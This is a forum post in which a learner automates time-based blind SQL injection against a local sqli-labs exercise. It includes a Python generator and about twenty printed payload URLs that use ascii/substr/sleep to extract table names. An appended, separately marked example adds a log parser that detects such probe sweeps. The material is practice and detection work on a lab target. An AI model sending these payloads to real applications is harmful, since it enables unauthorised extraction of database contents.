Nov-10-2021, 10:55 PM
hello all ...
I'm trying to solve a SQL challenge on my local machine (https://github.com/Audi-1/sqli-labs).
I'm trying to solve the blind (time-based) one, and I wrote this code to automate the process:
Test code:
```python
target = "http://192.168.1.144/sqli-labs/Less-9/?id=1'"
for q in range(0, 5):
    for j in range(32, 50):
        dd = f"{target} and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit {q},1),{q+1},1))={j},sleep(5),1) --+"
        print(dd)
```
Output:
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=32,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=33,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=34,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=35,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=36,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=37,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=38,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=39,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=40,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=41,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=42,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=43,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=44,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=45,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=46,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=47,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=48,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=49,sleep(5),1) --+
http://192.168.1.144/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=32,sleep(5),1) --+
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=49,sleep(5),1) --+
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=32,sleep(5),1) --+
I need the result in red color to stay 0,1),2,1))=32. How can I do that?
I need them like this:
![[Image: Screenshot-from-2021-11-11-00-58-48.png]](https://i.postimg.cc/2yGmkwhL/Screenshot-from-2021-11-11-00-58-48.png)
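
Added example, not part of the original post: seen from the server side, the requests printed above form a recognisable sweep, where one client tries many character codes for the same row and character position. The sketch below parses that payload shape out of access-log lines and reports such sweeps; the log layout (`client request`), the client addresses and the `min_candidates` threshold are assumptions, and the regex covers only the payload form shown in this post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Shape of the probe in the post: limit ROW,1),POS,1))=CODE,sleep(SECS)
PROBE = re.compile(
    r"limit\s+(?P<row>\d+)\s*,\s*1\s*\)\s*,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)"
    r"\s*=\s*(?P<code>\d+)\s*,\s*sleep\s*\(\s*(?P<secs>\d+)",
    re.IGNORECASE,
)

def parse_probe(request):
    """Return (row, pos, code, secs) if the request carries the probe, else None."""
    decoded = unquote_plus(request)  # access logs usually hold the URL-encoded form
    m = PROBE.search(decoded)
    return tuple(int(m[k]) for k in ("row", "pos", "code", "secs")) if m else None

def find_sweeps(log_lines, min_candidates=5):
    """Group probes by (client, row, pos); a sweep tries many codes for one slot."""
    slots = defaultdict(set)
    for line in log_lines:
        client, _, request = line.partition(" ")
        probe = parse_probe(request)
        if probe:
            row, pos, code, _secs = probe
            slots[(client, row, pos)].add(code)
    return {slot: sorted(codes) for slot, codes in slots.items()
            if len(codes) >= min_candidates}

def sample_log():
    """Constructed access-log lines: one sweeping client, one ordinary client."""
    tmpl = ("10.0.0.5 GET /sqli-labs/Less-9/?id=1%27%20and%20if(ascii(substr(("
            "select%20table_name%20from%20information_schema.tables%20where%20"
            "table_schema=%27security%27%20limit%200,1),1,1))={code},sleep(5),1)"
            "%20--+ HTTP/1.1")
    lines = [tmpl.format(code=c) for c in range(32, 50)]
    lines.append("10.0.0.9 GET /sqli-labs/Less-9/?id=1 HTTP/1.1")
    return lines

if __name__ == "__main__":
    for (client, row, pos), codes in find_sweeps(sample_log()).items():
        print(f"{client}: row {row}, char {pos}, "
              f"{len(codes)} codes tried ({codes[0]}..{codes[-1]})")
```
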